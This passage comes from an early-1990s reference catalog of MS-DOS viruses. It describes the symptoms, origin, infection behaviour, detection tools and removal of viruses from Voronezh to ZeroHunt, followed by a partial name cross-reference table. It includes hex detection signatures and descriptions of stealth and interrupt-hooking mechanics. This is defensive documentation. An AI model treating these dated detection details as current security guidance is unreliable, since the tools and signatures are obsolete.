       virus reserves 3,744 bytes of memory for itself, it does not move the
       interrupt 12 return.  Interrupt 21 will be hooked by the virus.  This
       virus may also reserve 24 bytes of display memory on the display
       adapter card.

       After Voronezh is memory resident, .COM and .EXE files will be
       infected when they are executed.  Infected files will increase in
       length by 1,600 bytes, the virus will be located at the end of
       infected programs.  Infected programs will also contain the
       text string:

               "Voronezh,1990 2.01".

       It is unknown if this virus does anything besides replicate.

       Known variant(s) of Voronezh are:
       Voronezh B: Similar to the Voronezh Virus described above, the major
               difference with Voronezh B is that Voronezh B will infect files
               when they are executed or openned for any reason.  The original
               virus did not infect on file open.  The text string indicated
               for Voronezh is also found in this variant.

 
 Virus Name:  VP
 Aliases:
 V Status:    Rare
 Discovered:  May 1990
 Symptoms:    COMMAND.COM & .COM file growth, system slowdown
 Origin:      England
 Eff Length:  913 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method: ViruScan V64+, Pro-Scan 1.4+, AVTK 3.5+, F-Prot 1.12+,
              VirHunt 2.0+
 Removal Instructions:  Scan/D, Pro-Scan 1.4+, F-Prot 1.12+, VirHunt 2.0+, or
              Delete infected files
 General Comments:
       The VP Virus was first isolated in May, 1990.  It is a non-resident
       generic .COM infector, and will infect COMMAND.COM.  When an
       infected program is run, the virus will attempt to locate and
       infect another .COM file.  In some cases, such as COMMAND.COM, the
       virus will display the contents of the program being infected.  In
       other cases, the virus may attempt to execute the program being
       infected.  Infected files increase in length by 913 bytes, and
       can be identified as the following hex string will appear near both
       the beginning and the end of an infected program: '4503EB1808655650'.

 
 Virus Name:  W13
 Aliases:     Toothless Virus, W13-A
 V Status:    Endangered
 Discovered:  December, 1989
 Symptoms:    .COM growth
 Origin:      Poland
 Eff Length:  534 Bytes
 Type Code:   PNC - Parasitic Non-Resident .COM Infector
 Detection Method: ViruScan V63+, F-Prot, IBM Scan, Pro-Scan 1.4+, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  Scan/D, F-Prot, Pro-Scan 1.4+, VirHunt 2.0+
              or delete infected files
 General Comments:
       The W13 virus is a .COM file infector that doesn't do much
       except for infect files.  The virus was isolated in December
       1989 in Poland.

       While W13 is based on the Vienna virus, it does not damage files
       or have some of the other side effects of the Vienna virus.  It
       contains a number of bugs which prevent it from being a good
       replicator.

       Known variant(s) of W13 include:
       W13-B     : The original W13 Virus with several bugs fixed.  This
                   variants length is 507 bytes instead of 534 bytes.
 
 
 Virus Name:  Westwood
 Aliases:
 V Status:    Rare
 Discovered:  August, 1990
 Symptoms:    .COM & .EXE growth; TSR; system slowdown; black window;
              file deletion on Friday The 13ths
 Origin:      Westwood, California, USA
 Eff Length:  1,819 - 1,829 Bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method: ViruScan V67+, F-Prot 1.12+, Pro-Scan 2.01+
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The Westwood Virus was isolated in August, 1990 in Westwood, California.
       This virus is a substantially altered variant of the Jerusalem B virus,
       enough so that all anti-virals tested which could detect Jerusalem B
       were unable to identify it.  Like Jerusalem, it infects .COM, .EXE, and
       overlay files, but not COMMAND.COM.

       The first time a program infected with the Westwood virus is executed,
       the virus will install itself memory resident as a low system memory
       TSR of 1,808 bytes.  Interrupts 8 and 21 will be hooked.  If the
       system date happens to be a Friday The 13th, interrupt 22 will also
       be hooked.

       After the virus is memory resident, any program which is executed
       will become infected with the Westwood virus.  .COM files will
       increase by 1,829 bytes with the virus's code located at the beginning
       of the infected program.  .EXE files and overlay files are infected
       with the virus's code added to the end of the program.  .EXE files
       increase in length by between 1,819 and 1,829 bytes.  Unlike most
       variants of the Jerusalem virus, Westwood does not reinfect .EXE files.

       Infected systems will experience a system slowdown occurring after
       the virus has been memory resident for 30 minutes.  At this time, the
       "black window" or "black box" common to the Jerusalem virus will
       appear on the lower left hand side of the system display.  Screen
       contain around the area of the "box" may be corrupted if screen writes
       happened to be occurring when the box appeared.

       On Friday The 13ths, the Westwood Virus will delete any programs that
       are executed once the virus becomes memory resident.

       Also see: Jerusalem B

 
 Virus Name:  Whale
 Aliases:     Mother Fish, Stealth Virus, Z The Whale
 V Status:    Research
 Discovered:  August, 1990
 Symptoms:    .COM & .EXE growth; decrease in available memory;
              system slowdown; video flicker; slow screen writes;
              file allocation errors; simulated system reboot
 Origin:      Hamburg, West Germany
 Eff Length:  9,216 Bytes
 Type Code:   PRhA - Parasitic Resident .COM & .EXE Infector
 Detection Method: ViruScan V67+, Pro-Scan 2.01+
 Removal Instructions:  Scan/D, CleanUp V67+, Pro-Scan 2.01+,
              or Delete infected files
 General Comments:
       The Whale Virus was submitted in early September, 1990.  This virus
       had been rumored to exist since the isolation of the Fish 6 Virus in
       June, 1990.  It has been referred to by several names besides Whale,
       including Mother Fish and Z The Whale.  The origin of this virus is
       subject to some speculation, though it is probably from Hamburg,
       West Germany due to a reference within the viral code once it is
       decrypted.

       The first time a program infected with the Whale Virus is executed,
       the Whale will install itself memory resident in high system memory
       but below the 640K DOS boundary.  On the author's XT clone, the
       virus always starts at address 9D90.  Available free memory will
       be decreased by 9,984 bytes.  Most utilities which display memory
       usage will also indicate a value for total system memory which is
       9,984 bytes less than what is actually installed.

       The following text string can be found in memory on systems
       infected with the Whale virus:

              "Z THE WHALE".

       Immediately upon becoming memory resident, the system user will
       experience the system slowing down.  Noticeable effects of the
       system slowdown include video flicker to extremely slow screen
       writes.  Some programs may appear to "hang", though they will
       eventually execute properly in most cases since the "hang" is due
       to the slowing of the system.

       When a program is executed with the Whale memory resident, the virus
       will infect the program.  Infected programs increase in length, the
       actual change in length is usually 9,216 bytes.  Note the "usually":
       this virus does occasionally infect a program with a "mutant" which
       will be a different length.  If the file length increase is exactly
       9,216 bytes, the Whale will hide the change in file length when a
       disk directory command is executed.  If the file length of the viral
       code added to the program is other than 9,216 bytes, the file length
       displayed with the directory command will either the actual infected
       file length, or the actual infected file length minus 9,216 bytes.

       Executing the DOS CHKDSK program on infected systems will result in
       file allocation errors being reported.  If CHKDSK /F is executed,
       file damage will result.

       The Whale also alters the program's date/time in the directory when
       the file is executed, though it is not set to the system date/time
       of infection.  Occasionally, Whale will alter the directory entry
       for the program it is infecting improperly, resulting in the directory
       entry becoming invalid.  These programs with invalid directory
       entries will appear when the directory is listed, but some disk
       utilities will not allow access to the program.  In these cases, the
       directory entry can be fixed with Norton Utilities FD command to
       reset the file date.

       The Whale occasionally will change its behavior while it is memory
       resident.  While most of the time it only infects files when
       executed, there are periods of time when it will infect any file
       opened for any reason.  It will also, at times, disinfect files
       when they are copied with the DOS copy command, at other times it
       will not "disinfect on the fly".

       Occasionally, the Whale Virus will simulate what appears to be a
       system reboot.  While this doesn't always occur, when it does occur
       the Break key is disabled so that the user cannot exit unexpectedly
       from the execution of the system's AutoExec.Bat file.  If the
       AutoExec.Bat file contained any software which does file opens of
       other executable programs, those opened executable programs will
       be infected at that time if they were not previously infected.
       Typically, files infected in this manner will increase by 9,216
       bytes though it will not be shown in a directory listing.

       A hidden file may be found in the root directory of drive C: on
       infected files.  This file is not always present, the virus will
       sometimes remove it, only to recreate it again at a later time.
       The name of this hidden file is FISH-#9.TBL, it contains an
       image of the hard disk's partition table along with the following
       message:

               "Fish Virus #9
                A Whale is no Fish!
                Mind her Mutant Fish
                and the hidden Fish Eggs
                for they are damaging.
                The sixth Fish mutates
                only if the Whale is in
                her Cave."

       After the discovery of this hidden file, the author of this
       document made several attempt to have the Fish 6 Virus mutate
       by introducing it and Whale into a system.  Under no circumstances
       did a mutation of either virus result, the resultant files were
       infected with both an identifiable Fish 6 infection and a Whale
       infection.

       Whale is hostile to debuggers and contains many traps to prevent
       successful decryption of the virus.  One of its "traps" is to lock
       out the keyboard if it determines a debugger is in use.

 
 Virus Name:  Wisconsin
 Aliases:     Death To Pascal
 V Status:    Rare
 Discovered:  September, 1990
 Symptoms:    .COM growth; Message; Write Protect Errors; .PAS files
              disappear; file date/time changes
 Origin:      Wisconsin, USA
 Eff Length:  825 Bytes
 Type Code:   PNC - Parasitic Non-Resident .COM Infector
 Detection Method: ViruScan V67+, Pro-Scan 2.01+
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The Wisconsin Virus was received in September, 1990.  The origin of
       the sample was Wisconsin, which is where its name came from.  It is
       also reported to have been isolated at about this same time in
       California.  Wisconsin is a non-resident infector of .COM files, but
       it does not infect COMMAND.COM.

       When a program infected with the Wisconsin Virus is executed, the virus
       will alter the date and time of the program being executed to the
       current system date and time.  The Wisconsin Virus will then infect
       one other .COM file in the current directory.  Infected files will
       increase in length by 825 bytes, with the viral code located at the
       beginning of the file.

       If an attempt is made to execute a program infected with the Wisconsin
       virus from a write-protected diskette, a write protect error will
       occur.  This virus does not intercept this error.

       Infected programs may display the following message:

               "Death to Pascal."

       When this message is displayed, any .PAS files located in the
       current directory will be deleted.  This message cannot be seen in
       infected files as it is encrypted.


 Virus Name:  Wolfman
 Aliases:
 V Status:    Rare
 Discovered:  July, 1990
 Symptoms:    TSR; .COM & .EXE growth
 Origin:      Taiwan
 Eff Length:  2,064 Bytes
 Type Code:   PRsAK - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V66+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Wolfman Virus was discovered in Taiwan in July, 1990.  It is a
       memory resident generic infector of .COM and .EXE files, including
       COMMAND.COM.

       The first time a program infected with the Wolfman Virus is executed,
       the virus will install itself memory resident as a TSR with 2 blocks
       of memory reserved.  The first block of memory reserved is 68,032
       bytes in length, the second block of reserved memory is 4,544 bytes
       in length.  The total 72,640 bytes of memory is in low system memory,
       and available free memory is decreased by a corresponding amount.
       The virus hooks interrupts 09, 10, 16, 21, 2F, ED, and F5.

       Once the virus is memory resident, the virus will infect any .COM or
       .EXE file which is executed if the pre-infection file length is
       greater than or equal to 2,064 bytes.  Infected files increase in
       length by 2,064 bytes.  .COM files which are infected will have the
       virus's code located at the beginning of the .COM file, .EXE files
       will have the virus located at the end.

       It is unknown when Wolfman activates, or if it is destructive.


 Virus Name:  Yankee Doodle
 Aliases:     TP44VIR, Five O'clock Virus
 V Status:    Common - Europe
 Discovered:  September, 1989
 Symptoms:    .COM & .EXE growth, melody @ 5 p.m.
 Origin:      Austria or Bulgaria
 Eff Length:  2,885 or 2,899 Bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V42+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: CleanUp V64+, Scan/D, VirClean, F-Prot, or
              delete infected files
 General Comments:
       The Yankee Doodle virus was isolated by Alexander Holy of
       the North Atlantic Project in Vienna, Austria, on
       September 30, 1989.  It was also isolated in Bulgaria shortly
       thereafter, where it is known as TP44VIR.

       This virus is a parasitic virus which infects both .COM and .EXE
       files, and installs itself memory resident.  After installing itself
       memory resident, it will play Yankee Doodle on the system speaker at
       17:00.  Infected programs will be increased in length by 2,899 bytes.

       Other than being disruptive by playing Yankee Doodle, this
       virus currently does nothing else harmful besides infecting
       files.

       As a side note, some variants of the Yankee Doodle Virus will seek
       out and modify Ping Pong viruses, changing them so that they self-
       destruct after 100 infections.

       Known variants of the Yankee Doodle Virus are:
       TP33VIR - This variant disables interrupts 1 and 3, thus interfering
                 with using debuggers to isolate it.  The behavior of the
                 virus also has been changed so that it infected programs
                 will play Yankee Doodle at 5PM.  The second to the last
                 byte in infected files is the virus's "version number",
                 in the case of TP33VIR, it is 21h (33 in hex).
       TP34VIR - Similar to TP33VIR, except that this variant is memory
                 resident, and infects programs as they are executed.
                 The second to the last byte in infected files is 22h.
       TP38VIR - Similar to TP34VIR, except that .COM and .EXE files are
                 handled in a different way, and this variant will
                 disinfect itself if it is loaded with CodeView active in
                 memory.  The second to the last byte in infected files
                 is 26h.  TP38VIR was first isolated in Bulgaria in
                 July 1988, and is the oldest virus known in Bulgaria.
       TP41VIR - Similar to TP38VIR, except the second to the last byte
                 in infected files is 29h.
       TP42VIR - This variant of Vacsina tests to determine if the system
                 is infected with the Ping Pong virus, and if it is, will
                 attempt to disable the Ping Pong virus by modifying it.
                 The second to the last byte in infected files is now 2Ah.
       TP44VIR - Similar to TP42VIR, the second to the last byte of infected
                 files is 2Ch.
       TP45VIR - Similar to TP44VIR, the second to the last byte of infected
                 files is 2Dh.
       TP46VIR - Similar to TP45VIR, except that this variant can detect
                 and kill the Cascade (1701) Virus.  The second to the last
                 byte of infected files is now 2Eh.
       Yankee Doodle-B: Very similar to the Yankee Doodle virus, except
                 the length of the viral code is 2,772 bytes.

       Also see: Vacsina


 Virus Name:  Yankee 2
 Aliases:     Yankee Virus, Yankee-go-Home, 1961
 V Status:    Endangered
 Discovered:  September, 1989
 Symptoms:    .EXE growth, Yankee Doodle
 Origin:      Bulgaria
 Eff Length:  1,961 Bytes
 Type Code:   PNE - Parasitic Non-Resident .EXE Infector
 Detection Method:  ViruScan V62+, Virex PC, AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: Scan/D, or delete infected files
 General Comments:
       The Yankee 2, or Yankee Virus, was isolated in Bulgaria
       in 1989.  Unlike the Yankee Doodle Virus, the Yankee 2
       Virus is not memory resident.  It also only infects .EXE files,
       adding 1,961 bytes to their length.  The virus will attempt to
       infect an .EXE file in the current directory whenever an
       infected program is executed.  If it is successful in locating
       an uninfected .EXE file, and infects it, Yankee Doodle will be
       played on the system speaker.  Infected files will have the
       hex string '6D6F746865726675636B6572' at the end.

       The Yankee 2 Virus will not infect CodeView.

       Known variant(s) of the Yankee 2 virus are:
       1624    - This variant is similar to Yankee 2 in function, the major
                 change is that its effective length is 1,624 bytes.


 Virus Name:  Yukon Overwriting
 Aliases:
 V Status:    New
 Discovered:  January, 1991
 Symptoms:    Divide Overflow errors; Beginning of Programs Overwritten
 Origin:      Canada
 Eff Length:  151 Bytes
 Type Code:   ONCK - Overwriting Non-Resident .COM Infector
 Detection Method:
 Removal Instructions: Delete infected files
 General Comments:
       The Yukon Overwriting Virus was isolated in January, 1991 in Canada.
       This virus is a non-resident overwriting virus that infects .COM files,
       including COMMAND.COM.

       When a program infected with the Yukon Overwriting Virus is executed,
       the virus will infect all .COM programs in the current directory.
       Infected programs will have the first 151 bytes of the program
       overwritten with the virus.  Their date and time in the disk directory
       will not be altered in the process of infection.

       After infecting all of the .COM files in the current directory, the
       program the user was attempting to execute will fail with a Divide
       Overflow error.

       Infected programs can be easily identified because the text string
       Divide Overflow$ will be located beginning at offset 87h within the
       infected program.

       Programs infected with the Yukon Overwriting Virus cannot be
       disinfected as the portion overwritten by the virus is not stored.
       Infected programs must be deleted and replaced with uninfected copies.


 Virus Name:  Zero Bug
 Aliases:     Palette, 1536
 V Status:    Endangered
 Discovered:  September, 1989
 Symptoms:    .COM growth (see text), TSR, graphics display
 Origin:      Netherlands
 Eff Length:  1,536 bytes
 Type Code:   PRsC - Parasitic Resident .COM Infector
 Detection Method:  Viruscan/X V67+, F-Prot, Pro-Scan 1.4+, VirexPC, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions: Scan/D/X, CleanUp V66+, F-Prot, Pro-Scan 1.4+,
              VirHunt 2.0+, or delete infected files
 General Comments:
       The Zero Bug virus was first isolated in the Netherlands by
       Jan Terpstra in September, 1989.  This virus is a memory
       resident .COM file infector.  Infected .COM files will
       increase in size by 1,536 bytes, however the increase in file
       length will not show up when the disk directory is displayed.

       The virus's main objective is to infect the copy of
       COMMAND.COM indicated by the environment variable COMSPEC.
       If COMSPEC doesn't point to anything, the Zero Bug virus will
       install itself memory resident using INT 21h.

       After the virus has either infected COMMAND.COM or become
       memory resident, it will infect all .COM files that are
       accessed, including those accessed by actions such as COPY or
       XCOPY.  Any .COM file created on an infected system will also
       be infected.

       If the currently loaded COMMAND.COM is infected, the virus
       will hook into the timer interrupt 1Ch, and after a certain
       amount of time has past, a smiley face character (ASCII 01)
       will appear and eat all the zeros it can find on the screen.
       The virus does not delete files or format disks in its present
       form.


 Virus Name:  ZeroHunt
 Aliases:     Minnow, Stealth
 V Status:    Research
 Discovered:  December, 1990
 Symptoms:    Internal changes to COM files
 Origin:      USA
 Eff Length:  416 Bytes
 Type Code:   PRCK - Parasitic Overwriting .COM Infector
 Detection Method:  Viruscan V72+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete infected files
 General Comments:
       The ZeroHunt, or Minnow, Virus was submitted in December, 1990 by
       Paul Ferguson of Washington, DC.  ZeroHunt is a memory resident
       overwriting infector of COM files, including COMMAND.COM.  This virus
       is classified as a Stealth Virus.

       When the first program infected with the ZeroHunt Virus is executed,
       the virus will install itself memory resident in the command environment
       area.  It occupies approximately 200 bytes of memory and hooks a number
       of interrupts, including interrupt 21 by remapping.

       Once ZeroHunt is memory resident, it waits for a COM file to be openned
       or executed which contains 416 or more bytes of 00h characters.  These
       characters usually are stack space in the file, and most commonly occur
       in EXE files which have been converted to COM files.  If the candidate
       COM file contains enough 00h characters, ZeroHunt will infect the file
       by writing its viral code over the first 416 bytes of the 00h characters.
       ZeroHunt then alters the first four bytes of the newly infected file so
       that upon execution its viral code will execute first.

       Like other Stealth class viruses, ZeroHunt will disinfect the file on
       the fly, so that the virus cannot be detected in files if it is memory
       resident.  Since infected files have been infected internally by over-
       writing stack space, there will be no change in infected file length.

       ZeroHunt carries no activation criteria at the present time, it just
       replicates.




PART III.  Virus Common Name Cross-Reference

 The following is a cross-reference of common virus names back to
 the name they are listed by in the virus information section.

 Virus Name              Refer To Virus(es) In Part II
   
 @ Virus                 Turbo 448
 62-B                    Vienna
 100 Years Virus         4096
 163 COM Virus           Tiny Virus
 217                     Polish 217
 333                     Kennedy
 382                     382 Recovery Virus
 382 Recovery Virus      382 Recovery Virus
 405                     405
 437                     VFSI
 453                     RPVS
 500 Virus               Golden Gate
 505                     Burger
 509                     Burger
 512                     512
 512-A                   512
 512-B                   512
 512-C                   512
 512-D                   512
 512 Virus               Friday The 13th COM Virus
 529                     Polish 529
 541                     Burger
 623                     VHP2
 632                     Saratoga
 637                     Vcomm
 642                     Icelandic
 646                     646
 648                     Vienna
 765                     Perfume
 867                     Typo COM
 903                     903
 944                     Dot Killer
 1008                    1008
 1022                    Fellowship
 1024-B                  Nomenklatura
 1168                    Datacrime-B
 1210                    1210
 1226                    1226
 1226D                   1226D
 1226M                   1226D
 1253                    1253
 1260                    1260
 1280                    Datacrime
 1374                    Little Pieces
 1381 Virus              1381 Virus
 1392                    1392
 1514                    Datacrime II
 1536                    Zero Bug
 1539                    Christmas Virus
 1554                    1554
 1559                    1554
 1575                    1575
 1575-B                  1575
 1577                    1575
 1591                    1575
 1605                    1605
 1624                    Yankee 2
 1701                    Cascade
 1704                    Cascade, Cascade-B
 1704 Format             1704 Format
 1704-B                  Cascade B
 1720                    1720
 17Y4                    Cascade
 1808                    Jerusalem
 1813                    Jerusalem
 1917                    Datacrime IIB
 1961                    Yankee 2
 1971                    Eight Tunes
 2080                    Fu Manchu
 2086                    Fu Manchu
 2100                    V2100
 2131                    2131
 2576                    Taiwan 4
 2930                    Traceback II
 2930-B                  Traceback II
 3012                    Plastique
 3066                    Traceback
 3066-B                  Traceback
 3066-B2                 Traceback
 3551                    SysLock
 3555                    SysLock
 3880                    Itavir
 4096                    4096
 4096-B                  4096
 4096-C                  4096
 4711                    Perfume
 4870 Overwriting        4870 Overwriting
 5120                    5120
 8920                    Print Screen
 909090h Virus           Burger
 9800:0000 Virus         1554
 A-204                   Jerusalem B
 Advent                  Syslock
 AIDS                    AIDS
 AIDS II                 AIDS II
 AirCop                  AirCop
 Akuku                   Akuku
 Alabama                 Alabama
 Alameda                 Alameda
 Ambulance Car           Ambulance Car
 Amoeba Virus            1392
 Amstrad                 Amstrad
 Anarkia                 Jerusalem B
 Anarkia-B               Jerusalem B
 Anthrax                 Anthrax
 AntiCad                 1253
 Anti-Pascal             Anti-Pascal
 Anti-Pascal 400         Anti-Pascal II
 Anti-Pascal 440         Anti-Pascal II
 Anti-Pascal 480         Anti-Pascal II
 Anti-Pascal 529         Anti-Pascal
 Anti-Pascal 605         Anti-Pascal
 Anti-Pascal II          Anti-Pascal II
 AP-400                  Anti-Pascal II
 AP-440                  Anti-Pascal II
 AP-480                  Anti-Pascal II
 AP-529                  Anti-Pascal
 AP-605                  Anti-Pascal
 April 1st               Suriv 1.01
 April 1st-B             Suriv 2.01
 Arab Star               Jerusalem B
 Armagedon               Armagedon
 Armagedon The First     Armagedon
 Armagedon The Greek     Armagedon
 Ashar                   Ashar
 Attention!              Attention!
 Austrian                Vienna
 Basic Virus             5120
 Best Wish               Best Wishes
 Best Wishes             Best Wishes
 Best Wishes B           Best Wishes
 Black Avenger           Dark Avenger
 Black Friday            Jerusalem
 Black Monday            Black Monday
 Blackjack               Cascade-B
 Blood                   Blood
 Blood 2                 Blood
 Bloody!                 Bloody!
 Boot                    Ping Pong-B
 Bouncing Ball           Ping Pong
 Bouncing Dot            Ping Pong
 Brain                   Brain
 Burger                  Burger
 C-605                   Anti-Pascal
 Carioca                 Carioca
 Cascade                 Cascade
 Cascade-B               Cascade-B
 Casper                  Casper
 Century Virus           4096
 Chaos                   Chaos
 Choinka                 Father Christmas
 Christmas In Japan      Christmas In Japan
 Christmas Violator      Violator B4
 Christmas Virus         Christmas Virus
 CIA                     Burger
 Columbus Day            Datacrime, Datacrime II, Datacrime IIB, Datacrime-B
 COM Virus               Friday The 13th COM Virus
 Computer Ogre           Disk Killer
 Cookie                  Cookie
 Cunning                 Cascade
 Cursy                   Cursy
 Dark Avenger            Dark Avenger
 Dark Avenger-B          Dark Avenger
 Dark Avenger II         V2000
 Dark Avenger III        V1024
 Datacrime               Datacrime
 Datacrime II            Datacrime II
 Datacrime IIB           Datacrime IIB
 Datacrime-B             Datacrime-B
 DataLock                DataLock
 DataLock 1.00           DataLock
 DBase                   DBase
 DBF Virus               DBase
 Dead Kennedy            Kennedy
 Death To Pascal         Wisconsin
 December 24th           Icelandic-III
 Den Zuk                 Den Zuk
 Destructor              Destructor V4.00
 Destructor V4.00        Destructor V4.00
 Devil's Dance           Devil's Dance
 Diana                   Dark Avenger
 Die Young Virus         V2000
 Dir Virus               Dir Virus
 Discom                  Discom
 Disk Crunching Virus    Icelandic, Saratoga
 Disk Killer             Disk Killer
 Disk Ogre               Disk Killer
 Do-Nothing Virus        Do-Nothing Virus
 Donald Duck             Stoned
 DOS-62                  Vienna
 DOS-68                  Vienna
 Durban                  Saturday The 14TH
 Dyslexia                Solano 2000
 Dyslexia 2.00           Solano 2000
 Dyslexia 2.01           Solano 2000
 EB 21                   Print Screen
 Eddie                   Dark Avenger
 Eddie Virus             Dark Avenger
 Eddie 3                 V651
 EDV                     EDV
 Eight Tunes             Eight Tunes
 European Fish Viruses   Fish Virus
 Evil                    Evil
 Evil-B                  Evil
 F-Word Virus            F-Word Virus
 Fall                    Cascade
 Falling Letters         Cascade, Ping Pong-B
 Falling Letters Boot    Swap Boot
 Father Christmas        Father Christmas
 Fellowship              Fellowship
 Fish 6                  Fish Virus
 Fish Virus              Fish Virus
 Five O'Clock Virus      Yankee Doodle
 Flash                   Flash
 Flip                    Flip
 Flip B                  Flip
 Form                    FORM-Virus
 Form Boot               FORM-Virus
 FORM-Virus              FORM-Virus
 Frere Virus             Frere Jacques
 Frere Jacques           Frere Jacques
 Friday 13th             Jerusalem
 Friday 13th COM Virus   Friday The 13th COM Virus
 Friday 13th-B           Friday The 13th COM Virus
 Friday 13th-C           Friday The 13th COM Virus
 FroDo                   4096
 Fu Manchu               Fu Manchu
 Fuck You                F-Word
 Fumble                  Typo COM
 G-Virus V1.3            Sorry
 Ghost Boot              Ghostballs
 Ghost COM               Ghostballs
 Ghostballs              Ghostballs
 Golden Gate             Golden Gate
 Grither                 Grither
 Green Left Virus        Groen Links
 Groen Links             Groen Links
 Guppy                   Guppy
 Hahaha                  AIDS
 Halloechen              Halloechen
 Happy Birthday Joshi    Joshi
 Happy N.Y.              Happy New Year, Happy New Year B
 Happy New Year          Happy New Year
 Happy New Year          Happy New Year B
 Hawaii                  Stoned
 Hebrew University       Jerusalem B
 Hemp Virus              Stoned
 HM2                     Plastique
 Holland Girl            Holland Girl
 Holland Girl 2          Holland Girl 2
 Holo                    Holocaust
 Holocaust               Holocaust
 Hybrid                  Hybryd
 Hybryd                  Hybryd
 Hymn                    Hymn
 Icelandic               Icelandic
 Icelandic-II            Icelandic-II
 Icelandic-III           Icelandic-III
 Ick                     IKV 528
 IDF Virus               4096
 IKV 528                 IKV 528
 Invader                 Invader
 Iraqui                  Iraqui Warrior
 Iraqui Warrior          Iraqui Warrior
 Israeli                 Jerusalem, Suriv 1.01, Suriv 2.01, Suriv 3.00
 Israeli Boot            Swap
 Italian                 Ping Pong
 Itavir                  Itavir
 Jeff                    Jeff
 Jerusalem               Jerusalem
 Jerusalem A             Jerusalem
 Jerusalem B             Jerusalem B
 Jerusalem C             Jerusalem B
 Jerusalem D             Jerusalem B
 Jerusalem DC            Jerusalem B
 Jerusalem E             Jerusalem B
 Jerusalem E2            Jerusalem B
 Jocker                  Joker
 JoJo                    JoJo
 JoJo 2                  JoJo 2
 Joker                   Joker
 Joshi                   Joshi
 July 13TH               July 13TH
 June 16TH               June 16TH
 Kamikazi                Kamikazi
 Kemerovo                Kemerovo
 Kennedy                 Kennedy
 Keypress                Keypress
 Korea                   Korea
 Kukac                   Turbo Kukac
 LBC Boot                Korea
 Leapfrog                USSR 516
 Lehigh                  Lehigh
 Lehigh University       Lehigh
 Lehigh-2                Lehigh
 Lehigh-B                Lehigh
 Leprosy                 Leprosy
 Leprosy 1.00            Leprosy
 Leprosy-B               Leprosy
 Leprosy-C               Leprosy
 Liberty                 Liberty
 Liberty-B               Liberty
 Liberty-C               Liberty
 Lisbon                  Lisbon
 Little Pieces           Little Pieces
 Live after Death Virus  V800
 Lozinsky                Lozinsky
 Mardi Bros              Mardi Bros
 Marijuana               Stoned
 Mazatlan                Golden Gate
 Merritt                 Alameda
 Mendoza                 Jerusalem B
 Mexican                 Devil's Dance
 MG                      MG
 MG-2                    MG-2
 MG-3                    MG-2
 MGTU                    MGTU
 Miami                   Friday The 13th
 Microbes                Microbes
 Minnow                  ZeroHunt
 Mirror                  Mirror
 Mistake                 Typo Boot
 MIX1                    MIX1
 MIX/1                   MIX1
 Mix1                    MIX1
 Monxla                  Monxla
 Monxla B                Monxla B
 Mother Fish             Whale
 Munich                  Friday The 13th COM Virus
 Murphy                  Murphy
 Murphy-1                Murphy
 Murphy-2                Murphy
 Music Boot              MusicBug
 Music Bug               MusicBug
 Music Virus             Oropax
 MusicBug                MusicBug
 Musician                Oropax
 New Jerusalem           New Jerusalem
 New Zealand             Stoned
 News Flash              Leprosy
 Nina                    Nina
 Nomenclature            Nomenklatura
 Nomenklatura            Nomenklatura
 Number 1                Number One
 Number of the Beast     512 Virus
 Number One              Number One
 Ogre                    Disk Killer
 Ohio                    Ohio
 One In Eight            Vienna
 One In Ten              Icelandic, Icelandic-II
 One In Two              Saratoga
 Ontario                 Ontario
 Oropax                  Oropax
 Oulu                    1008
 P1                      Evil, Phoenix, PhoenixD, Proud
 Pakistani               Brain
 Pakistani Brain         Brain
 Palette                 Zero Bug
 Paris                   Paris
 Parity                  Parity
 Park ESS                Jerusalem B
 Payday                  Payday
 Peking                  Alameda
 Pentagon                Pentagon
 Perfume                 Perfume
 Phoenix                 Phoenix
 PhoenixD                PhoenixD
 Ping Pong               Ping Pong
 Ping Pong-B             Ping Pong-B
 Ping Pong-C             Ping Pong-C
 Pixel                   Amstrad
 Plastique               Plastique
 Plastique 1             Plastique
 Plastique 2             Plastique-B
 Plastique 4.51          Plastique
 Plastique 5.21          Plastique-B
 Plastique Boot          Invader
 Plastique-B             Plastique-B
 PLO                     Jerusalem
 Point Killer            Dot Killer
 Polimer                 Polimer
 Polimer Tapeworm        Polimer
 Polish 217              Polish 217
 Polish 217 B            Polish 217
 Polish 529              Polish 529
 Polish 583              Polish 583
 Polish 961              Stone`90
 Polish Stupid           Polish 217
 Polish-2                Turbo 448, Turbo Kukac
 Pretoria                June 16TH
 Print Screen            Print Screen
 Print Screen-2          Print Screen
 Proud                   Proud
 PRTSC Virus             Print Screen
 Prudents Virus          1210
 PSQR Virus              1720
 Puerto                  Jerusalem B
 Rape-11                 Rape-11
 Red Diavolyata          Red Diavolyata
 RedX                    Ambulance Car
 Rostov                  Stoned
 RPVS                    RPVS
 RPVS-B                  RPVS
 Russian                 Jerusalem
 Saddam                  Saddam
 San Diego               Stoned
 Saturday The 14th       Saturday The 14th
 Saratoga                Saratoga
 Saratoga 2              Icelandic
 Scott's Valley          Scott's Valley
 Seoul                   Alameda
 Sentinel                Sentinel
 Sex Revolution v1.1     Stoned
 Sex Revolution v2.0     Stoned
 SF Virus                SF Virus
 Shake Virus             Shake Virus
 Shoe_Virus              Ashar
 Shoe_Virus-B            Ashar-B
 Skism-1                 Jerusalem B
 Slow                    Slow
 Slowdown                Slow
 Smithsonian             Stoned
 Solano 2000             Solano 2000
 Sorry                   Sorry
 South African           Friday The 13th COM Virus
 Spyer                   Spyer
 Stealth Viruses         EDV, Fish, Holocaust, Joshi, Murphy, V651, V800, V1024,
                         V2000, V2100, ZeroHunt, 512, 4096

 Stone`90                Stone`90
 Stone-90                Stone`90
 Stoned                  Stoned
 Stoned II               Stoned
 Stoned-B                Stoned
 Stoned-C                Stoned
 Stoned-D                Stoned
 Stoned-E                Stoned
 Stoned-F                Stoned
 Stupid Virus            Do-Nothing
 Subliminal 1.10         Subliminal 1.10
 Sunday                  Sunday
 Sunday-B                Sunday
 Sunday-C                Sunday
